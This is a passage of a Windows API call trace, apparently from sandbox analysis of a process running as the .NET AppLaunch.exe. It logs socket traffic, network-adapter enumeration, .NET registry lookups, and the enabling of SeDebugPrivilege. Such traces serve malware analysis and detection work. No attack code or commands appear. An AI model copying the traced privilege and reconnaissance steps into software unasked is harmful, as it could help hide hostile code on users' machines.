pguid=0x38ee54*(Data1=0x1a06ed67, Data2=0xa84e, Data3=0x4c21, Data4=([0]=0x8a, [1]=0x6c, [2]=0xdc, [3]=0xf6, [4]=0x40, [5]=0x98, [6]=0xdb, [7]=0x6d))) returned 0x0 [0184.163] CoCreateGuid (in: pguid=0x38ed98 | out: pguid=0x38ed98*(Data1=0x4d049beb, Data2=0x22e1, Data3=0x46c8, Data4=([0]=0xbb, [1]=0x89, [2]=0xba, [3]=0x61, [4]=0x73, [5]=0x28, [6]=0xea, [7]=0x49))) returned 0x0 [0184.164] send (s=0x268, buf=0x25dcb27*, len=154, flags=0) returned 154 [0184.165] recv (in: s=0x268, buf=0x25de0bc, len=8192, flags=0 | out: buf=0x25de0bc*) returned 3698 [0184.473] GetCurrentProcess () returned 0xffffffff [0184.473] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e680 | out: TokenHandle=0x38e680*=0x26c) returned 1 [0184.475] CloseHandle (hObject=0x26c) returned 1 [0184.475] GetCurrentProcess () returned 0xffffffff [0184.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e698 | out: TokenHandle=0x38e698*=0x26c) returned 1 [0184.476] CloseHandle (hObject=0x26c) returned 1 [0185.648] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x38f040 | out: pFixedInfo=0x0, pOutBufLen=0x38f040) returned 0x6f [0186.037] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x728970 [0186.037] GetNetworkParams (in: pFixedInfo=0x728970, pOutBufLen=0x38f040 | out: pFixedInfo=0x728970, pOutBufLen=0x38f040) returned 0x0 [0186.056] LocalFree (hMem=0x728970) returned 0x0 [0186.058] GetAdaptersAddresses (in: Family=0x0, Flags=0xc0, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x38f144*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x38f144*=0xb0c) returned 0x6f [0186.068] LocalAlloc (uFlags=0x0, uBytes=0xb0c) returned 0x734608 [0186.068] GetAdaptersAddresses (in: Family=0x0, Flags=0xc0, Reserved=0x0, AdapterAddresses=0x734608, SizePointer=0x38f144*=0xb0c | out: AdapterAddresses=0x734608*(Alignment=0xf00000178, Length=0x178, IfIndex=0xf, Next=0x734aa0, AdapterName="{2E4C7576-F100-4C39-A70C-5E6D4E6BF9B7}", FirstUnicastAddress=0x734848, FirstAnycastAddress=0x0, FirstMulticastAddress=0x7348d4, FirstDnsServerAddress=0x734a50, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #4", FriendlyName="Local Area Connection 4", PhysicalAddress=([0]=0x0, [1]=0x19, [2]=0x7a, [3]=0x46, [4]=0x53, [5]=0x4c, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xf, ZoneIndices=([0]=0xf, [1]=0xf, [2]=0xf, [3]=0xf, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x734a78, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000009000000, Dhcpv4Server.lpSockaddr=0x734780*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x12c89f1d, FirstDnsSuffix=0x0), SizePointer=0x38f144*=0xb0c) returned 0x0 [0186.096] GetPerAdapterInfo (in: IfIndex=0xf, pPerAdapterInfo=0x0, pOutBufLen=0x38edac | out: pPerAdapterInfo=0x0, pOutBufLen=0x38edac) returned 0x6f [0186.109] LocalAlloc (uFlags=0x0, uBytes=0x5c) returned 0x6f3ce8 [0186.109] GetPerAdapterInfo (in: IfIndex=0xf, pPerAdapterInfo=0x6f3ce8, pOutBufLen=0x38edac | out: pPerAdapterInfo=0x6f3ce8, pOutBufLen=0x38edac) returned 0x0 [0186.123] LocalFree (hMem=0x6f3ce8) returned 0x0 [0186.125] GetPerAdapterInfo (in: IfIndex=0x1, pPerAdapterInfo=0x0, pOutBufLen=0x38edac | out: pPerAdapterInfo=0x0, pOutBufLen=0x38edac) returned 0x6f [0186.140] LocalAlloc (uFlags=0x0, uBytes=0x5c) returned 0x6f3ce8 [0186.140] GetPerAdapterInfo (in: IfIndex=0x1, pPerAdapterInfo=0x6f3ce8, pOutBufLen=0x38edac | out: pPerAdapterInfo=0x6f3ce8, pOutBufLen=0x38edac) returned 0x0 [0186.209] LocalFree (hMem=0x6f3ce8) returned 0x0 [0186.211] LocalFree (hMem=0x734608) returned 0x0 [0186.271] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270 [0186.271] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x26c [0186.293] GetCurrentProcess () returned 0xffffffff [0186.293] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed1c | out: TokenHandle=0x38ed1c*=0x27c) returned 1 [0186.297] CloseHandle (hObject=0x27c) returned 1 [0186.297] GetCurrentProcess () returned 0xffffffff [0186.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed34 | out: TokenHandle=0x38ed34*=0x27c) returned 1 [0186.297] CloseHandle (hObject=0x27c) returned 1 [0186.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e20c | out: phkResult=0x38e20c*=0x27c) returned 0x0 [0186.307] RegQueryValueExW (in: hKey=0x27c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x38e22c, lpData=0x0, lpcbData=0x38e228*=0x0 | out: lpType=0x38e22c*=0x1, lpData=0x0, lpcbData=0x38e228*=0xe) returned 0x0 [0186.307] RegQueryValueExW (in: hKey=0x27c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x38e22c, lpData=0x2619448, lpcbData=0x38e228*=0xe | out: lpType=0x38e22c*=0x1, lpData="Client", lpcbData=0x38e228*=0xe) returned 0x0 [0186.307] RegCloseKey (hKey=0x27c) returned 0x0 [0186.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efd8 | out: phkResult=0x38efd8*=0x27c) returned 0x0 [0186.311] RegQueryValueExW (in: hKey=0x27c, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x38eff4, lpData=0x0, lpcbData=0x38eff0*=0x0 | out: lpType=0x38eff4*=0x0, lpData=0x0, lpcbData=0x38eff0*=0x0) returned 0x2 [0186.311] RegCloseKey (hKey=0x27c) returned 0x0 [0186.314] GetCurrentProcessId () returned 0xf1c [0186.319] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x38e874 | out: lpLuid=0x38e874*(LowPart=0x14, HighPart=0)) returned 1 [0186.320] GetCurrentProcess () returned 0xffffffff [0186.321] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x38e870 | out: TokenHandle=0x38e870*=0x27c) returned 1 [0186.321] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x261a4c8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0186.321] CloseHandle (hObject=0x27c) returned 1 [0186.323] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.420] EnumProcessModules (in: hProcess=0x27c, lphModule=0x261a50c, cb=0x100, lpcbNeeded=0x38efe4 | out: lphModule=0x261a50c, lpcbNeeded=0x38efe4) returned 1 [0186.422] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x261a64c, cb=0xc | out: lpmodinfo=0x261a64c*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.423] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.423] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x7359a8, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.424] CoTaskMemFree (pv=0x7359a8) [0186.424] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.425] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x7359a8, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.425] CoTaskMemFree (pv=0x7359a8) [0186.425] CloseHandle (hObject=0x27c) returned 1 [0186.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.426] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x0) returned 0x2 [0186.427] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.427] RegQueryValueExW (in: hKey=0x27c, lpValueName="UseHttpPipeliningAndBufferPooling", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.427] RegCloseKey (hKey=0x27c) returned 0x0 [0186.427] GetCurrentProcessId () returned 0xf1c [0186.428] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.428] EnumProcessModules (in: hProcess=0x27c, lphModule=0x261d124, cb=0x100, lpcbNeeded=0x38efe4 | out: lphModule=0x261d124, lpcbNeeded=0x38efe4) returned 1 [0186.429] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x261d264, cb=0xc | out: lpmodinfo=0x261d264*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.429] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.429] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x7359a8, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.429] CoTaskMemFree (pv=0x7359a8) [0186.429] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.430] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x7359a8, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.430] CoTaskMemFree (pv=0x7359a8) [0186.430] CloseHandle (hObject=0x27c) returned 1 [0186.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x0) returned 0x2 [0186.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.431] RegQueryValueExW (in: hKey=0x27c, lpValueName="UseSafeSynchronousClose", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.431] RegCloseKey (hKey=0x27c) returned 0x0 [0186.432] GetCurrentProcessId () returned 0xf1c [0186.432] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.432] EnumProcessModules (in: hProcess=0x27c, lphModule=0x261fbfc, cb=0x100, lpcbNeeded=0x38efe4 | out: lphModule=0x261fbfc, lpcbNeeded=0x38efe4) returned 1 [0186.433] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x261fd3c, cb=0xc | out: lpmodinfo=0x261fd3c*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.433] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.433] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x7359a8, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.433] CoTaskMemFree (pv=0x7359a8) [0186.433] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.433] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x7359a8, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.434] CoTaskMemFree (pv=0x7359a8) [0186.434] CloseHandle (hObject=0x27c) returned 1 [0186.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x0) returned 0x2 [0186.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.435] RegQueryValueExW (in: hKey=0x27c, lpValueName="UseStrictRfcInterimResponseHandling", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.435] RegCloseKey (hKey=0x27c) returned 0x0 [0186.436] GetCurrentProcessId () returned 0xf1c [0186.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.436] EnumProcessModules (in: hProcess=0x27c, lphModule=0x26226c0, cb=0x100, lpcbNeeded=0x38efe4 | out: lphModule=0x26226c0, lpcbNeeded=0x38efe4) returned 1 [0186.437] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x2622800, cb=0xc | out: lpmodinfo=0x2622800*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.437] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.437] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x7359a8, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.437] CoTaskMemFree (pv=0x7359a8) [0186.438] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.438] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x7359a8, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.438] CoTaskMemFree (pv=0x7359a8) [0186.438] CloseHandle (hObject=0x27c) returned 1 [0186.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x0) returned 0x2 [0186.439] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.439] RegQueryValueExW (in: hKey=0x27c, lpValueName="AllowDangerousUnicodeDecompositions", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.439] RegCloseKey (hKey=0x27c) returned 0x0 [0186.439] GetCurrentProcessId () returned 0xf1c [0186.439] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.440] EnumProcessModules (in: hProcess=0x27c, lphModule=0x26250f8, cb=0x100, lpcbNeeded=0x38efe4 | out: lphModule=0x26250f8, lpcbNeeded=0x38efe4) returned 1 [0186.441] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x2625238, cb=0xc | out: lpmodinfo=0x2625238*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.441] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.441] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x7359a8, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.441] CoTaskMemFree (pv=0x7359a8) [0186.441] CoTaskMemAlloc (cb=0x804) returned 0x7359a8 [0186.441] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x7359a8, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.441] CoTaskMemFree (pv=0x7359a8) [0186.441] CloseHandle (hObject=0x27c) returned 1 [0186.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x0) returned 0x2 [0186.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.442] RegQueryValueExW (in: hKey=0x27c, lpValueName="UseStrictIPv6AddressParsing", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.442] RegCloseKey (hKey=0x27c) returned 0x0 [0186.443] GetCurrentProcessId () returned 0xf1c [0186.443] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.443] EnumProcessModules (in: hProcess=0x27c, lphModule=0x2627b14, cb=0x100, lpcbNeeded=0x38efe4 | out: lphModule=0x2627b14, lpcbNeeded=0x38efe4) returned 1 [0186.444] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x2627c54, cb=0xc | out: lpmodinfo=0x2627c54*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.444] CoTaskMemAlloc (cb=0x804) returned 0x735c60 [0186.444] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x735c60, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.445] CoTaskMemFree (pv=0x735c60) [0186.445] CoTaskMemAlloc (cb=0x804) returned 0x735c60 [0186.445] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x735c60, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.445] CoTaskMemFree (pv=0x735c60) [0186.445] CloseHandle (hObject=0x27c) returned 1 [0186.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x0) returned 0x2 [0186.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.446] RegQueryValueExW (in: hKey=0x27c, lpValueName="AllowAllUriEncodingExpansion", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.446] RegCloseKey (hKey=0x27c) returned 0x0 [0186.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.467] RegQueryValueExW (in: hKey=0x27c, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.467] RegCloseKey (hKey=0x27c) returned 0x0 [0186.467] GetCurrentProcessId () returned 0xf1c [0186.467] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.468] EnumProcessModules (in: hProcess=0x27c, lphModule=0x262b39c, cb=0x100, lpcbNeeded=0x38efe0 | out: lphModule=0x262b39c, lpcbNeeded=0x38efe0) returned 1 [0186.469] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x262b4dc, cb=0xc | out: lpmodinfo=0x262b4dc*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.469] CoTaskMemAlloc (cb=0x804) returned 0x735c60 [0186.469] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x735c60, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.469] CoTaskMemFree (pv=0x735c60) [0186.469] CoTaskMemAlloc (cb=0x804) returned 0x735c60 [0186.469] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x735c60, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.470] CoTaskMemFree (pv=0x735c60) [0186.470] CloseHandle (hObject=0x27c) returned 1 [0186.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efd8 | out: phkResult=0x38efd8*=0x0) returned 0x2 [0186.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efd8 | out: phkResult=0x38efd8*=0x27c) returned 0x0 [0186.471] RegQueryValueExW (in: hKey=0x27c, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x38eff4, lpData=0x0, lpcbData=0x38eff0*=0x0 | out: lpType=0x38eff4*=0x0, lpData=0x0, lpcbData=0x38eff0*=0x0) returned 0x2 [0186.471] RegCloseKey (hKey=0x27c) returned 0x0 [0186.471] 